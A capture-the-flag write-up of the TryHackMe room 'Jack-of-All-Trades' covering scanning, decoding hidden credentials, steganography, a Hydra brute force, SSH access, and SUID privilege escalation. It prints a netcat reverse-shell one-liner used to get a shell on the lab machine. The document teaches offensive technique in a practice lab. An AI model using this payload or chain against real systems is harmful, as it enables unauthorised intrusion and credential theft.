Jack-of-All-Trades TryHackMe Writeup
We performed an nmap scan of all ports, with scripts and software versions.
We tried to access the website from the browser, but it will not open.
But, if we try curl we will see the content of the site, there is a string in base64.
Decode the message, you will get a password.
We access the file “recovery.php “, there we will have to decode another message, this time it will be more complicated.
We access the site with the hint, we see a famous “dinosaur”. After reading the message and the image, we already sense what we have to do.
Download stego.jpg image
Let’s try the other image… And we got credentials.
Searching through Google, we found this tutorial that explains how to change the port to browse Firefox, so we follow the guide, access the file “recovery.php” and use the credentials obtained.
We make a small one and check that we can execute commands.
Reverse shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 443 >/tmp/f
We will use the above payload + URL-Encode to obtain a shell on the victim machine.
We access the “/home/” and find a list of passwords for the user “Jack”.
We use the Hydra tool to obtain the correct password in just seconds.
We access by SSH, we enumerate a file “user.jpg”. We transfer it to our machine and read the user flag.
Evidence user flag
Abuse of privileges
We launch the lse.sh tool, enumerate the uncommon SUID strings binary.
We look for information, we see that it is possible to load a variable with an arbitrary path and to be able to execute strings to read its content.
First, I tried to read the file “id_rsa” of the root user, but it does not exist. So a quick option is to read the flag directly.